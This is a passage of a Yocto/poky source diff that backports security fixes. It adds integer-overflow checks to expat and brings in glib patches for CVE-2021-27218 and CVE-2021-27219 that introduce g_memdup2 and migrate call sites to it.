++ /* Detect and prevent integer overflow */ ++ if (n > INT_MAX - EXPAND_SPARE) { ++ return XML_ERROR_NO_MEMORY; ++ } ++ /* Detect and prevent integer overflow. ++ * The preprocessor guard addresses the "always false" warning ++ * from -Wtype-limits on platforms where ++ * sizeof(unsigned int) < sizeof(size_t), e.g. on x86_64. */ ++#if UINT_MAX >= SIZE_MAX ++ if ((unsigned)(n + EXPAND_SPARE) > (size_t)(-1) / sizeof(XML_Char)) { ++ return XML_ERROR_NO_MEMORY; ++ } ++#endif ++ + uri = (XML_Char *)MALLOC(parser, (n + EXPAND_SPARE) * sizeof(XML_Char)); + if (! uri) + return XML_ERROR_NO_MEMORY; +@@ -3708,6 +3766,21 @@ addBinding(XML_Parser parser, PREFIX *prefix, const ATTRIBUTE_ID *attId, + if (parser->m_freeBindingList) { + b = parser->m_freeBindingList; + if (len > b->uriAlloc) { ++ /* Detect and prevent integer overflow */ ++ if (len > INT_MAX - EXPAND_SPARE) { ++ return XML_ERROR_NO_MEMORY; ++ } ++ ++ /* Detect and prevent integer overflow. ++ * The preprocessor guard addresses the "always false" warning ++ * from -Wtype-limits on platforms where ++ * sizeof(unsigned int) < sizeof(size_t), e.g. on x86_64. */ ++#if UINT_MAX >= SIZE_MAX ++ if ((unsigned)(len + EXPAND_SPARE) > (size_t)(-1) / sizeof(XML_Char)) { ++ return XML_ERROR_NO_MEMORY; ++ } ++#endif ++ + XML_Char *temp = (XML_Char *)REALLOC( + parser, b->uri, sizeof(XML_Char) * (len + EXPAND_SPARE)); + if (temp == NULL) +@@ -3720,6 +3793,21 @@ addBinding(XML_Parser parser, PREFIX *prefix, const ATTRIBUTE_ID *attId, + b = (BINDING *)MALLOC(parser, sizeof(BINDING)); + if (! b) + return XML_ERROR_NO_MEMORY; ++ ++ /* Detect and prevent integer overflow */ ++ if (len > INT_MAX - EXPAND_SPARE) { ++ return XML_ERROR_NO_MEMORY; ++ } ++ /* Detect and prevent integer overflow. ++ * The preprocessor guard addresses the "always false" warning ++ * from -Wtype-limits on platforms where ++ * sizeof(unsigned int) < sizeof(size_t), e.g. on x86_64. */ ++#if UINT_MAX >= SIZE_MAX ++ if ((unsigned)(len + EXPAND_SPARE) > (size_t)(-1) / sizeof(XML_Char)) { ++ return XML_ERROR_NO_MEMORY; ++ } ++#endif ++ + b->uri + = (XML_Char *)MALLOC(parser, sizeof(XML_Char) * (len + EXPAND_SPARE)); + if (! b->uri) { +@@ -6141,7 +6229,24 @@ defineAttribute(ELEMENT_TYPE *type, ATTRIBUTE_ID *attId, XML_Bool isCdata, + } + } else { + DEFAULT_ATTRIBUTE *temp; ++ ++ /* Detect and prevent integer overflow */ ++ if (type->allocDefaultAtts > INT_MAX / 2) { ++ return 0; ++ } ++ + int count = type->allocDefaultAtts * 2; ++ ++ /* Detect and prevent integer overflow. ++ * The preprocessor guard addresses the "always false" warning ++ * from -Wtype-limits on platforms where ++ * sizeof(unsigned int) < sizeof(size_t), e.g. on x86_64. */ ++#if UINT_MAX >= SIZE_MAX ++ if ((unsigned)count > (size_t)(-1) / sizeof(DEFAULT_ATTRIBUTE)) { ++ return 0; ++ } ++#endif ++ + temp = (DEFAULT_ATTRIBUTE *)REALLOC(parser, type->defaultAtts, + (count * sizeof(DEFAULT_ATTRIBUTE))); + if (temp == NULL) +@@ -6792,8 +6897,20 @@ lookup(XML_Parser parser, HASH_TABLE *table, KEY name, size_t createSize) { + /* check for overflow (table is half full) */ + if (table->used >> (table->power - 1)) { + unsigned char newPower = table->power + 1; ++ ++ /* Detect and prevent invalid shift */ ++ if (newPower >= sizeof(unsigned long) * 8 /* bits per byte */) { ++ return NULL; ++ } ++ + size_t newSize = (size_t)1 << newPower; + unsigned long newMask = (unsigned long)newSize - 1; ++ ++ /* Detect and prevent integer overflow */ ++ if (newSize > (size_t)(-1) / sizeof(NAMED *)) { ++ return NULL; ++ } ++ + size_t tsize = newSize * sizeof(NAMED *); + NAMED **newV = (NAMED **)table->mem->malloc_fcn(tsize); + if (! newV) +@@ -7143,6 +7260,20 @@ nextScaffoldPart(XML_Parser parser) { + if (dtd->scaffCount >= dtd->scaffSize) { + CONTENT_SCAFFOLD *temp; + if (dtd->scaffold) { ++ /* Detect and prevent integer overflow */ ++ if (dtd->scaffSize > UINT_MAX / 2u) { ++ return -1; ++ } ++ /* Detect and prevent integer overflow. ++ * The preprocessor guard addresses the "always false" warning ++ * from -Wtype-limits on platforms where ++ * sizeof(unsigned int) < sizeof(size_t), e.g. on x86_64. */ ++#if UINT_MAX >= SIZE_MAX ++ if (dtd->scaffSize > (size_t)(-1) / 2u / sizeof(CONTENT_SCAFFOLD)) { ++ return -1; ++ } ++#endif ++ + temp = (CONTENT_SCAFFOLD *)REALLOC( + parser, dtd->scaffold, dtd->scaffSize * 2 * sizeof(CONTENT_SCAFFOLD)); + if (temp == NULL) +@@ -7212,8 +7343,26 @@ build_model(XML_Parser parser) { + XML_Content *ret; + XML_Content *cpos; + XML_Char *str; +- int allocsize = (dtd->scaffCount * sizeof(XML_Content) +- + (dtd->contentStringLen * sizeof(XML_Char))); ++ ++ /* Detect and prevent integer overflow. ++ * The preprocessor guard addresses the "always false" warning ++ * from -Wtype-limits on platforms where ++ * sizeof(unsigned int) < sizeof(size_t), e.g. on x86_64. */ ++#if UINT_MAX >= SIZE_MAX ++ if (dtd->scaffCount > (size_t)(-1) / sizeof(XML_Content)) { ++ return NULL; ++ } ++ if (dtd->contentStringLen > (size_t)(-1) / sizeof(XML_Char)) { ++ return NULL; ++ } ++#endif ++ if (dtd->scaffCount * sizeof(XML_Content) ++ > (size_t)(-1) - dtd->contentStringLen * sizeof(XML_Char)) { ++ return NULL; ++ } ++ ++ const size_t allocsize = (dtd->scaffCount * sizeof(XML_Content) ++ + (dtd->contentStringLen * sizeof(XML_Char))); + + ret = (XML_Content *)MALLOC(parser, allocsize); + if (! ret) diff --git a/poky/meta/recipes-core/expat/expat_2.2.9.bb b/poky/meta/recipes-core/expat/expat_2.2.9.bb index cd38df91d9..757c18c5fa 100644 --- a/poky/meta/recipes-core/expat/expat_2.2.9.bb +++ b/poky/meta/recipes-core/expat/expat_2.2.9.bb @@ -1,13 +1,16 @@ SUMMARY = "A stream-oriented XML parser library" DESCRIPTION = "Expat is an XML parser library written in C. It is a stream-oriented parser in which an application registers handlers for things the parser might find in the XML document (like start tags)" -HOMEPAGE = "http://expat.sourceforge.net/" +HOMEPAGE = "https://github.com/libexpat/libexpat" SECTION = "libs" LICENSE = "MIT" LIC_FILES_CHKSUM = "file://COPYING;md5=5b8620d98e49772d95fc1d291c26aa79" -SRC_URI = "git://github.com/libexpat/libexpat.git;protocol=https \ +SRC_URI = "git://github.com/libexpat/libexpat.git;protocol=https;branch=master \ file://CVE-2013-0340.patch \ + file://CVE-2021-45960.patch \ + file://CVE-2021-46143.patch \ + file://CVE-2022-22822-27.patch \ file://libtool-tag.patch \ " diff --git a/poky/meta/recipes-core/fts/fts_1.2.7.bb b/poky/meta/recipes-core/fts/fts_1.2.7.bb index ea820cb0c3..d3b0f31eda 100644 --- a/poky/meta/recipes-core/fts/fts_1.2.7.bb +++ b/poky/meta/recipes-core/fts/fts_1.2.7.bb @@ -10,7 +10,7 @@ SECTION = "libs" SRCREV = "0bde52df588e8969879a2cae51c3a4774ec62472" -SRC_URI = "git://github.com/pullmoll/musl-fts.git" +SRC_URI = "git://github.com/pullmoll/musl-fts.git;branch=master;protocol=https" S = "${WORKDIR}/git" diff --git a/poky/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27218.patch b/poky/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27218.patch new file mode 100644 index 0000000000..6257763d8d --- /dev/null +++ b/poky/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27218.patch @@ -0,0 +1,129 @@ +Backport of: + +From 0f384c88a241bbbd884487b1c40b7b75f1e638d3 Mon Sep 17 00:00:00 2001 +From: Krzesimir Nowak <qdlacz@gmail.com> +Date: Wed, 10 Feb 2021 23:51:07 +0100 +Subject: [PATCH] gbytearray: Do not accept too large byte arrays + +GByteArray uses guint for storing the length of the byte array, but it +also has a constructor (g_byte_array_new_take) that takes length as a +gsize. gsize may be larger than guint (64 bits for gsize vs 32 bits +for guint). It is possible to call the function with a value greater +than G_MAXUINT, which will result in silent length truncation. This +may happen as a result of unreffing GBytes into GByteArray, so rather +be loud about it. + +(Test case tweaked by Philip Withnall.) + +(Backport 2.66: Add #include gstrfuncsprivate.h in the test case for +`g_memdup2()`.) + +Upstream-Status: Backport [https://mirrors.ocf.berkeley.edu/ubuntu/pool/main/g/glib2.0/glib2.0_2.64.6-1~ubuntu20.04.3.debian.tar.xz] +CVE: CVE-2021-27218 +Signed-off-by: Neetika Singh <Neetika.Singh@kpit.com> +Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com> + +--- + glib/garray.c | 6 ++++++ + glib/gbytes.c | 4 ++++ + glib/tests/bytes.c | 35 ++++++++++++++++++++++++++++++++++- + 3 files changed, 44 insertions(+), 1 deletion(-) + +--- a/glib/garray.c ++++ b/glib/garray.c +@@ -2234,6 +2234,10 @@ g_byte_array_steal (GByteArray *array, + * Create byte array containing the data. The data will be owned by the array + * and will be freed with g_free(), i.e. it could be allocated using g_strdup(). + * ++ * Do not use it if @len is greater than %G_MAXUINT. #GByteArray ++ * stores the length of its data in #guint, which may be shorter than ++ * #gsize. ++ * + * Since: 2.32 + * + * Returns: (transfer full): a new #GByteArray +@@ -2245,6 +2249,8 @@ g_byte_array_new_take (guint8 *data, + GByteArray *array; + GRealArray *real; + ++ g_return_val_if_fail (len <= G_MAXUINT, NULL); ++ + array = g_byte_array_new (); + real = (GRealArray *)array; + g_assert (real->data == NULL); +--- a/glib/gbytes.c ++++ b/glib/gbytes.c +@@ -519,6 +519,10 @@ g_bytes_unref_to_data (GBytes *bytes, + * g_bytes_new(), g_bytes_new_take() or g_byte_array_free_to_bytes(). In all + * other cases the data is copied. + * ++ * Do not use it if @bytes contains more than %G_MAXUINT ++ * bytes. #GByteArray stores the length of its data in #guint, which ++ * may be shorter than #gsize, that @bytes is using. ++ * + * Returns: (transfer full): a new mutable #GByteArray containing the same byte data + * + * Since: 2.32 +--- a/glib/tests/bytes.c ++++ b/glib/tests/bytes.c +@@ -10,12 +10,12 @@ + */ + + #undef G_DISABLE_ASSERT +-#undef G_LOG_DOMAIN + + #include <stdio.h> + #include <stdlib.h> + #include <string.h> + #include "glib.h" ++#include "glib/gstrfuncsprivate.h" + + /* Keep in sync with glib/gbytes.c */ + struct _GBytes +@@ -334,6 +334,38 @@ test_to_array_transferred (void) + } + + static void ++test_to_array_transferred_oversize (void) ++{ ++ g_test_message ("g_bytes_unref_to_array() can only take GBytes up to " ++ "G_MAXUINT in length; test that longer ones are rejected"); ++ ++ if (sizeof (guint) >= sizeof (gsize)) ++ { ++ g_test_skip ("Skipping test as guint is not smaller than gsize"); ++ } ++ else if (g_test_undefined ()) ++ { ++ GByteArray *array = NULL; ++ GBytes *bytes = NULL; ++ gpointer data = g_memdup2 (NYAN, N_NYAN); ++ gsize len = ((gsize) G_MAXUINT) + 1; ++ ++ bytes = g_bytes_new_take (data, len); ++ g_test_expect_message (G_LOG_DOMAIN, G_LOG_LEVEL_CRITICAL, ++ "g_byte_array_new_take: assertion 'len <= G_MAXUINT' failed"); ++ array = g_bytes_unref_to_array (g_steal_pointer (&bytes)); ++ g_test_assert_expected_messages (); ++ g_assert_null (array); ++ ++ g_free (data); ++ } ++ else ++ { ++ g_test_skip ("Skipping test as testing undefined behaviour is disabled"); ++ } ++} ++ ++static void + test_to_array_two_refs (void) + { + gconstpointer memory; +@@ -410,6 +442,7 @@ main (int argc, char *argv[]) + g_test_add_func ("/bytes/to-array/transfered", test_to_array_transferred); + g_test_add_func ("/bytes/to-array/two-refs", test_to_array_two_refs); + g_test_add_func ("/bytes/to-array/non-malloc", test_to_array_non_malloc); ++ g_test_add_func ("/bytes/to-array/transferred/oversize", test_to_array_transferred_oversize); + g_test_add_func ("/bytes/null", test_null); + + return g_test_run (); diff --git a/poky/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-01.patch b/poky/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-01.patch new file mode 100644 index 0000000000..2af9dd6aa4 --- /dev/null +++ b/poky/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-01.patch @@ -0,0 +1,170 @@ +Backport of: + +From 5e5f75a77e399c638be66d74e5daa8caeb433e00 Mon Sep 17 00:00:00 2001 +From: Philip Withnall <pwithnall@endlessos.org> +Date: Thu, 4 Feb 2021 13:30:52 +0000 +Subject: [PATCH 01/11] gstrfuncs: Add internal g_memdup2() function +MIME-Version: 1.0 +Content-Type: text/plain; charset=UTF-8 +Content-Transfer-Encoding: 8bit + +This will replace the existing `g_memdup()` function for use within +GLib. It has an unavoidable security flaw of taking its `byte_size` +argument as a `guint` rather than as a `gsize`. Most callers will +expect it to be a `gsize`, and may pass in large values which could +silently be truncated, resulting in an undersize allocation compared +to what the caller expects. + +This could lead to a classic buffer overflow vulnerability for many +callers of `g_memdup()`. + +`g_memdup2()`, in comparison, takes its `byte_size` as a `gsize`. + +Spotted by Kevin Backhouse of GHSL. + +In GLib 2.68, `g_memdup2()` will be a new public API. In this version +for backport to older stable releases, it’s a new `static inline` API +in a private header, so that use of `g_memdup()` within GLib can be +fixed without adding a new API in a stable release series. + +Signed-off-by: Philip Withnall <pwithnall@endlessos.org> +Helps: GHSL-2021-045 +Helps: #2319 + +Upstream-Status: Backport [https://mirrors.ocf.berkeley.edu/ubuntu/pool/main/g/glib2.0/glib2.0_2.64.6-1~ubuntu20.04.3.debian.tar.xz] +CVE: CVE-2021-27219 +Signed-off-by: Neetika Singh <Neetika.Singh@kpit.com> +Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com> + +--- + docs/reference/glib/meson.build | 1 + + glib/gstrfuncsprivate.h | 55 +++++++++++++++++++++++++++++++++ + glib/meson.build | 1 + + glib/tests/strfuncs.c | 23 ++++++++++++++ + 4 files changed, 80 insertions(+) + create mode 100644 glib/gstrfuncsprivate.h + +--- a/docs/reference/glib/meson.build ++++ b/docs/reference/glib/meson.build +@@ -22,6 +22,7 @@ if get_option('gtk_doc') + 'gprintfint.h', + 'gmirroringtable.h', + 'gscripttable.h', ++ 'gstrfuncsprivate.h', + 'glib-mirroring-tab', + 'gnulib', + 'pcre', +--- /dev/null ++++ b/glib/gstrfuncsprivate.h +@@ -0,0 +1,55 @@ ++/* GLIB - Library of useful routines for C programming ++ * Copyright (C) 1995-1997 Peter Mattis, Spencer Kimball and Josh MacDonald ++ * ++ * This library is free software; you can redistribute it and/or ++ * modify it under the terms of the GNU Lesser General Public ++ * License as published by the Free Software Foundation; either ++ * version 2.1 of the License, or (at your option) any later version. ++ * ++ * This library is distributed in the hope that it will be useful, ++ * but WITHOUT ANY WARRANTY; without even the implied warranty of ++ * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU ++ * Lesser General Public License for more details. ++ * ++ * You should have received a copy of the GNU Lesser General Public ++ * License along with this library; if not, see <http://www.gnu.org/licenses/>. ++ */ ++ ++#include <glib.h> ++#include <string.h> ++ ++/* ++ * g_memdup2: ++ * @mem: (nullable): the memory to copy. ++ * @byte_size: the number of bytes to copy. ++ * ++ * Allocates @byte_size bytes of memory, and copies @byte_size bytes into it ++ * from @mem. If @mem is %NULL it returns %NULL. ++ * ++ * This replaces g_memdup(), which was prone to integer overflows when ++ * converting the argument from a #gsize to a #guint. ++ * ++ * This static inline version is a backport of the new public API from ++ * GLib 2.68, kept internal to GLib for backport to older stable releases. ++ * See https://gitlab.gnome.org/GNOME/glib/-/issues/2319. ++ * ++ * Returns: (nullable): a pointer to the newly-allocated copy of the memory, ++ * or %NULL if @mem is %NULL. ++ * Since: 2.68 ++ */ ++static inline gpointer ++g_memdup2 (gconstpointer mem, ++ gsize byte_size) ++{ ++ gpointer new_mem; ++ ++ if (mem && byte_size != 0) ++ { ++ new_mem = g_malloc (byte_size); ++ memcpy (new_mem, mem, byte_size); ++ } ++ else ++ new_mem = NULL; ++ ++ return new_mem; ++} +--- a/glib/meson.build ++++ b/glib/meson.build +@@ -268,6 +268,7 @@ glib_sources = files( + 'gslist.c', + 'gstdio.c', + 'gstrfuncs.c', ++ 'gstrfuncsprivate.h', + 'gstring.c', + 'gstringchunk.c', + 'gtestutils.c', +--- a/glib/tests/strfuncs.c ++++ b/glib/tests/strfuncs.c +@@ -32,6 +32,8 @@ + #include <string.h> + #include "glib.h" + ++#include "gstrfuncsprivate.h" ++ + #if defined (_MSC_VER) && (_MSC_VER <= 1800) + #define isnan(x) _isnan(x) + +@@ -219,6 +221,26 @@ test_memdup (void) + g_free (str_dup); + } + ++/* Testing g_memdup2() function with various positive and negative cases */ ++static void ++test_memdup2 (void) ++{ ++ gchar *str_dup = NULL; ++ const gchar *str = "The quick brown fox jumps over the lazy dog"; ++ ++ /* Testing negative cases */ ++ g_assert_null (g_memdup2 (NULL, 1024)); ++ g_assert_null (g_memdup2 (str, 0)); ++ g_assert_null (g_memdup2 (NULL, 0)); ++ ++ /* Testing normal usage cases */ ++ str_dup = g_memdup2 (str, strlen (str) + 1); ++ g_assert_nonnull (str_dup); ++ g_assert_cmpstr (str, ==, str_dup); ++ ++ g_free (str_dup); ++} ++ + /* Testing g_strpcpy() function with various positive and negative cases */ + static void + test_stpcpy (void) +@@ -2523,6 +2545,7 @@ main (int argc, + g_test_add_func ("/strfuncs/has-prefix", test_has_prefix); + g_test_add_func ("/strfuncs/has-suffix", test_has_suffix); + g_test_add_func ("/strfuncs/memdup", test_memdup); ++ g_test_add_func ("/strfuncs/memdup2", test_memdup2); + g_test_add_func ("/strfuncs/stpcpy", test_stpcpy); + g_test_add_func ("/strfuncs/str_match_string", test_str_match_string); + g_test_add_func ("/strfuncs/str_tokenize_and_fold", test_str_tokenize_and_fold); diff --git a/poky/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-02.patch b/poky/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-02.patch new file mode 100644 index 0000000000..20137ea5f3 --- /dev/null +++ b/poky/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-02.patch @@ -0,0 +1,249 @@ +From be8834340a2d928ece82025463ae23dee2c333d0 Mon Sep 17 00:00:00 2001 +From: Philip Withnall <pwithnall@endlessos.org> +Date: Thu, 4 Feb 2021 13:37:56 +0000 +Subject: [PATCH 02/11] gio: Use g_memdup2() instead of g_memdup() in obvious + places +MIME-Version: 1.0 +Content-Type: text/plain; charset=UTF-8 +Content-Transfer-Encoding: 8bit + +Convert all the call sites which use `g_memdup()`’s length argument +trivially (for example, by passing a `sizeof()`), so that they use +`g_memdup2()` instead. + +In almost all of these cases the use of `g_memdup()` would not have +caused problems, but it will soon be deprecated, so best port away from +it. + +Signed-off-by: Philip Withnall <pwithnall@endlessos.org> +Helps: #2319 + +Upstream-Status: Backport [https://mirrors.ocf.berkeley.edu/ubuntu/pool/main/g/glib2.0/glib2.0_2.64.6-1~ubuntu20.04.3.debian.tar.xz] +CVE: CVE-2021-27219 +Signed-off-by: Neetika Singh <Neetika.Singh@kpit.com> +Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com> + +--- + gio/gdbusconnection.c | 5 +++-- + gio/gdbusinterfaceskeleton.c | 3 ++- + gio/gfile.c | 7 ++++--- + gio/gsettingsschema.c | 5 +++-- + gio/gwin32registrykey.c | 8 +++++--- + gio/tests/async-close-output-stream.c | 6 ++++-- + gio/tests/gdbus-export.c | 5 +++-- + gio/win32/gwinhttpfile.c | 9 +++++---- + 8 files changed, 29 insertions(+), 19 deletions(-) + +--- a/gio/gdbusconnection.c ++++ b/gio/gdbusconnection.c +@@ -110,6 +110,7 @@ + #include "gasyncinitable.h" + #include "giostream.h" + #include "gasyncresult.h" ++#include "gstrfuncsprivate.h" + #include "gtask.h" + #include "gmarshal-internal.h" + +@@ -4007,7 +4008,7 @@ _g_dbus_interface_vtable_copy (const GDB + /* Don't waste memory by copying padding - remember to update this + * when changing struct _GDBusInterfaceVTable in gdbusconnection.h + */ +- return g_memdup ((gconstpointer) vtable, 3 * sizeof (gpointer)); ++ return g_memdup2 ((gconstpointer) vtable, 3 * sizeof (gpointer)); + } + + static void +@@ -4024,7 +4025,7 @@ _g_dbus_subtree_vtable_copy (const GDBus + /* Don't waste memory by copying padding - remember to update this + * when changing struct _GDBusSubtreeVTable in gdbusconnection.h + */ +- return g_memdup ((gconstpointer) vtable, 3 * sizeof (gpointer)); ++ return g_memdup2 ((gconstpointer) vtable, 3 * sizeof (gpointer)); + } + + static void +--- a/gio/gdbusinterfaceskeleton.c ++++ b/gio/gdbusinterfaceskeleton.c +@@ -28,6 +28,7 @@ + #include "gdbusmethodinvocation.h" + #include "gdbusconnection.h" + #include "gmarshal-internal.h" ++#include "gstrfuncsprivate.h" + #include "gtask.h" + #include "gioerror.h" + +@@ -701,7 +702,7 @@ add_connection_locked (GDBusInterfaceSke + * properly before building the hooked_vtable, so we create it + * once at the last minute. + */ +- interface_->priv->hooked_vtable = g_memdup (g_dbus_interface_skeleton_get_vtable (interface_), sizeof (GDBusInterfaceVTable)); ++ interface_->priv->hooked_vtable = g_memdup2 (g_dbus_interface_skeleton_get_vtable (interface_), sizeof (GDBusInterfaceVTable)); + interface_->priv->hooked_vtable->method_call = skeleton_intercept_handle_method_call; + } + +--- a/gio/gfile.c ++++ b/gio/gfile.c +@@ -60,6 +60,7 @@ + #include "gasyncresult.h" + #include "gioerror.h" + #include "glibintl.h" ++#include "gstrfuncsprivate.h" + + + /** +@@ -7854,7 +7855,7 @@ measure_disk_usage_progress (gboolean re + g_main_context_invoke_full (g_task_get_context (task), + g_task_get_priority (task), + measure_disk_usage_invoke_progress, +- g_memdup (&progress, sizeof progress), ++ g_memdup2 (&progress, sizeof progress), + g_free); + } + +@@ -7872,7 +7873,7 @@ measure_disk_usage_thread (GTask + data->progress_callback ? measure_disk_usage_progress : NULL, task, + &result.disk_usage, &result.num_dirs, &result.num_files, + &error)) +- g_task_return_pointer (task, g_memdup (&result, sizeof result), g_free); ++ g_task_return_pointer (task, g_memdup2 (&result, sizeof result), g_free); + else + g_task_return_error (task, error); + } +@@ -7896,7 +7897,7 @@ g_file_real_measure_disk_usage_async (GF + + task = g_task_new (file, cancellable, callback, user_data); + g_task_set_source_tag (task, g_file_real_measure_disk_usage_async); +- g_task_set_task_data (task, g_memdup (&data, sizeof data), g_free); ++ g_task_set_task_data (task, g_memdup2 (&data, sizeof data), g_free); + g_task_set_priority (task, io_priority); + + g_task_run_in_thread (task, measure_disk_usage_thread); +--- a/gio/gsettingsschema.c ++++ b/gio/gsettingsschema.c +@@ -20,6 +20,7 @@ + + #include "gsettingsschema-internal.h" + #include "gsettings.h" ++#include "gstrfuncsprivate.h" + + #include "gvdb/gvdb-reader.h" + #include "strinfo.c" +@@ -1067,9 +1068,9 @@ g_settings_schema_list_children (GSettin + + if (g_str_has_suffix (key, "/")) + { +- gint length = strlen (key); ++ gsize length = strlen (key); + +- strv[j] = g_memdup (key, length); ++ strv[j] = g_memdup2 (key, length); + strv[j][length - 1] = '\0'; + j++; + } +--- a/gio/gwin32registrykey.c ++++ b/gio/gwin32registrykey.c +@@ -28,6 +28,8 @@ + #include <ntstatus.h> + #include <winternl.h> + ++#include "gstrfuncsprivate.h" ++ + #ifndef _WDMDDK_ + typedef enum _KEY_INFORMATION_CLASS { + KeyBasicInformation, +@@ -247,7 +249,7 @@ g_win32_registry_value_iter_copy (const + new_iter->value_name_size = iter->value_name_size; + + if (iter->value_data != NULL) +- new_iter->value_data = g_memdup (iter->value_data, iter->value_data_size); ++ new_iter->value_data = g_memdup2 (iter->value_data, iter->value_data_size); + + new_iter->value_data_size = iter->value_data_size; + +@@ -268,8 +270,8 @@ g_win32_registry_value_iter_copy (const + new_iter->value_data_expanded_charsize = iter->value_data_expanded_charsize; + + if (iter->value_data_expanded_u8 != NULL) +- new_iter->value_data_expanded_u8 = g_memdup (iter->value_data_expanded_u8, +- iter->value_data_expanded_charsize); ++ new_iter->value_data_expanded_u8 = g_memdup2 (iter->value_data_expanded_u8, ++ iter->value_data_expanded_charsize); + + new_iter->value_data_expanded_u8_size = iter->value_data_expanded_charsize; + +--- a/gio/tests/async-close-output-stream.c ++++ b/gio/tests/async-close-output-stream.c +@@ -24,6 +24,8 @@ + #include <stdlib.h> + #include <string.h> + ++#include "gstrfuncsprivate.h" ++ + #define DATA_TO_WRITE "Hello world\n" + + typedef struct +@@ -147,9 +149,9 @@ prepare_data (SetupData *data, + + data->expected_size = g_memory_output_stream_get_data_size (G_MEMORY_OUTPUT_STREAM (data->data_stream)); + +- g_assert_cmpint (data->expected_size, >, 0); ++ g_assert_cmpuint (data->expected_size, >, 0); + +- data->expected_output = g_memdup (written, (guint)data->expected_size); ++ data->expected_output = g_memdup2 (written, data->expected_size); + + /* then recreate the streams and prepare them for the asynchronous close */ + destroy_streams (data); +--- a/gio/tests/gdbus-export.c ++++ b/gio/tests/gdbus-export.c +@@ -23,6 +23,7 @@ + #include <string.h> + + #include "gdbus-tests.h" ++#include "gstrfuncsprivate.h" + + /* all tests rely on a shared mainloop */ + static GMainLoop *loop = NULL; +@@ -671,7 +672,7 @@ subtree_introspect (GDBusConnection + g_assert_not_reached (); + } + +- return g_memdup (interfaces, 2 * sizeof (void *)); ++ return g_memdup2 (interfaces, 2 * sizeof (void *)); + } + + static const GDBusInterfaceVTable * +@@ -727,7 +728,7 @@ dynamic_subtree_introspect (GDBusConnect + { + const GDBusInterfaceInfo *interfaces[2] = { &dyna_interface_info, NULL }; + +- return g_memdup (interfaces, 2 * sizeof (void *)); ++ return g_memdup2 (interfaces, 2 * sizeof (void *)); + } + + static const GDBusInterfaceVTable * +--- a/gio/win32/gwinhttpfile.c ++++ b/gio/win32/gwinhttpfile.c +@@ -29,6 +29,7 @@ + #include "gio/gfile.h" + #include "gio/gfileattribute.h" + #include "gio/gfileinfo.h" ++#include "gstrfuncsprivate.h" + #include "gwinhttpfile.h" + #include "gwinhttpfileinputstream.h" + #include "gwinhttpfileoutputstream.h" +@@ -393,10 +394,10 @@ + child = g_object_new (G_TYPE_WINHTTP_FILE, NULL); + child->vfs = winhttp_file->vfs; + child->url = winhttp_file->url; +- child->url.lpszScheme = g_memdup (winhttp_file->url.lpszScheme, (winhttp_file->url.dwSchemeLength+1)*2); +- child->url.lpszHostName = g_memdup (winhttp_file->url.lpszHostName, (winhttp_file->url.dwHostNameLength+1)*2); +- child->url.lpszUserName = g_memdup (winhttp_file->url.lpszUserName, (winhttp_file->url.dwUserNameLength+1)*2); +- child->url.lpszPassword = g_memdup (winhttp_file->url.lpszPassword, (winhttp_file->url.dwPasswordLength+1)*2); ++ child->url.lpszScheme = g_memdup2 (winhttp_file->url.lpszScheme, (winhttp_file->url.dwSchemeLength+1)*2); ++ child->url.lpszHostName = g_memdup2 (winhttp_file->url.lpszHostName, (winhttp_file->url.dwHostNameLength+1)*2); ++ child->url.lpszUserName = g_memdup2 (winhttp_file->url.lpszUserName, (winhttp_file->url.dwUserNameLength+1)*2); ++ child->url.lpszPassword = g_memdup2 (winhttp_file->url.lpszPassword, (winhttp_file->url.dwPasswordLength+1)*2); + child->url.lpszUrlPath = wnew_path; + child->url.dwUrlPathLength = wcslen (wnew_path); + child->url.lpszExtraInfo = NULL; diff --git a/poky/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-03.patch b/poky/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-03.patch new file mode 100644 index 0000000000..eceff161a6 --- /dev/null +++ b/poky/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-03.patch @@ -0,0 +1,131 @@ +From 6110caea45b235420b98cd41d845cc92238f6781 Mon Sep 17 00:00:00 2001 +From: Philip Withnall <pwithnall@endlessos.org> +Date: Thu, 4 Feb 2021 13:39:25 +0000 +Subject: [PATCH 03/11] gobject: Use g_memdup2() instead of g_memdup() in + obvious places +MIME-Version: 1.0 +Content-Type: text/plain; charset=UTF-8 +Content-Transfer-Encoding: 8bit + +Convert all the call sites which use `g_memdup()`’s length argument +trivially (for example, by passing a `sizeof()`), so that they use +`g_memdup2()` instead. + +In almost all of these cases the use of `g_memdup()` would not have +caused problems, but it will soon be deprecated, so best port away from +it. + +Signed-off-by: Philip Withnall <pwithnall@endlessos.org> +Helps: #2319 + +Upstream-Status: Backport [https://mirrors.ocf.berkeley.edu/ubuntu/pool/main/g/glib2.0/glib2.0_2.64.6-1~ubuntu20.04.3.debian.tar.xz] +CVE: CVE-2021-27219 +Signed-off-by: Neetika Singh <Neetika.Singh@kpit.com> +Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com> + +--- + gobject/gsignal.c | 3 ++- + gobject/gtype.c | 9 +++++---- + gobject/gtypemodule.c | 3 ++- + gobject/tests/param.c | 4 +++- + 4 files changed, 12 insertions(+), 7 deletions(-) + +--- a/gobject/gsignal.c ++++ b/gobject/gsignal.c +@@ -28,6 +28,7 @@ + #include <signal.h> + + #include "gsignal.h" ++#include "gstrfuncsprivate.h" + #include "gtype-private.h" + #include "gbsearcharray.h" + #include "gvaluecollector.h" +@@ -1809,7 +1810,7 @@ g_signal_newv (const gchar *signal + node->single_va_closure_is_valid = FALSE; + node->flags = signal_flags & G_SIGNAL_FLAGS_MASK; + node->n_params = n_params; +- node->param_types = g_memdup (param_types, sizeof (GType) * n_params); ++ node->param_types = g_memdup2 (param_types, sizeof (GType) * n_params); + node->return_type = return_type; + 